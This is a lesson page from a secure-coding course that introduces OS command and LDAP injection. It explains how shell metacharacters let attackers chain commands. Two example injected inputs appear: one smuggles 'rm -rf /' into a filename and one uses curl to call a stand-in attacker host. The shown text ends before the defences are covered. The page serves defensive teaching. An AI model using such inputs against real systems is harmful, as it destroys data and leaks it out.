0Pricing
Secure Coding & OWASP Top 10 for Backend · Lesson

Preventing Command & LDAP Injection

Learn how OS command injection and LDAP injection work and how to defend against them with safe APIs, allow-lists, and proper encoding.

Beyond SQL Injection

Injection is not limited to SQL. Any time untrusted input is mixed into a command interpreter, you risk injection. Two dangerous cousins are OS command injection and LDAP injection.

This lesson shows how both work and how to stop them.

How Command Injection Works

Command injection happens when user input is passed to a shell. Shell metacharacters like ;, &&, and | let an attacker append their own commands.

  • Input file.txt; rm -rf / can delete data
  • Input $(curl evil.com) can exfiltrate or download

All lessons in this course

  1. Advanced SQLi & NoSQLi Techniques
  2. Comprehensive Input Validation Strategies
  3. Content Security Policy (CSP) for Backend
  4. Preventing Command & LDAP Injection
← Back to Secure Coding & OWASP Top 10 for Backend